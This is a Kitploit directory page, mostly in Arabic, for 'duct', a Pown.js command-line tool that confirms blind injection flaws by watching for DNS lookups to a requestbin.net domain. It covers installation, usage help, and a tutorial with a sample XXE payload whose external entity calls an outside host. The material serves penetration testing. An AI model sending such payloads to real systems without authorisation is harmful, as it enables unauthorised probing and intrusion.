Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
duct — أداة أساسية لاكتشاف هجمات الحقن الأعمى. | Kitploit
أدوات/GitHubGitHub/pownjs/duct
استغلال تطبيقات الويبجمع المعلوماتتحليل DNS
GitHubpownjs/duct

duct

أداة أساسية لاكتشاف هجمات الحقن الأعمى.

عرض المستودع
4913منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Follow on Twitter NPM Fury

Pown Duct

أداة أساسية لاكتشاف هجمات الحقن العمياء باستخدام القنوات الجانبية لنظام أسماء النطاقات.

الاعتمادات

هذه الأداة جزء من مبادرة المصادر المفتوحة لـ secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

ملاحظة: تستفيد هذه الأداة من خدمة http://requestbin.net. ستستخدم الإصدارات المستقبلية بنية تحتية مخصصة ومبنية حسب الطلب.

البدء السريع

هذه الأداة مصممة للاستخدام كجزء من Pown.js ولكن يمكن استدعاؤها بشكل منفصل كأداة مستقلة.

قم بتثبيت Pown أولاً كالمعتاد:

root@kitploit:~
$ npm install -g pown@latest

استدعاء مباشر من Pown:

root@kitploit:~
$ pown duct

بدلاً من ذلك، قم بتثبيت هذه الوحدة محلياً من جذر مشروعك:

root@kitploit:~
$ npm install @pown/duct --save

بمجرد الانتهاء، قم باستدعاء واجهة سطر أوامر pown:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

يمكنك أيضاً استخدام pown العام لاستدعاء الأداة محلياً:

root@kitploit:~
$ POWN_ROOT=. pown duct

الاستخدام

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

دليل تعليمي

هناك حالات نحتاج فيها إلى تنفيذ هجوم مثل حقن SQL أو XSS أو XXE أو SSRF ولكن التطبيق المستهدف لا يقدم أي مؤشر على أنه قابل للاختراق. إحدى الطرق للتأكد من وجود ثغرة أمنية هي محاولة حقن متجه هجوم صالح يجبر محلل DNS على الاستعلام عن نطاق مسيطر عليه. إذا نجحت عملية الاستعلام، فسيتم اعتبار الهجوم ناجحاً.

ملاحظة: قد تكون على دراية بـ Burp Collaborator الذي يقدم خدمة مماثلة للعملاء.

أولاً، نحتاج إلى اسم DNS مؤقت لحلّه:

root@kitploit:~
$ pown duct dns

screenshot

باستخدام DNS المقدم، قم بتأليف حمولتك. على سبيل المثال، ما يلي يمكن أن يؤدي إلى استعلام DNS إذا كانت ثغرة XXE موجودة.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

إذا نجح الهجوم، سنتلقى رسالة في الطرفية.

screenshot

تنزيل الأداة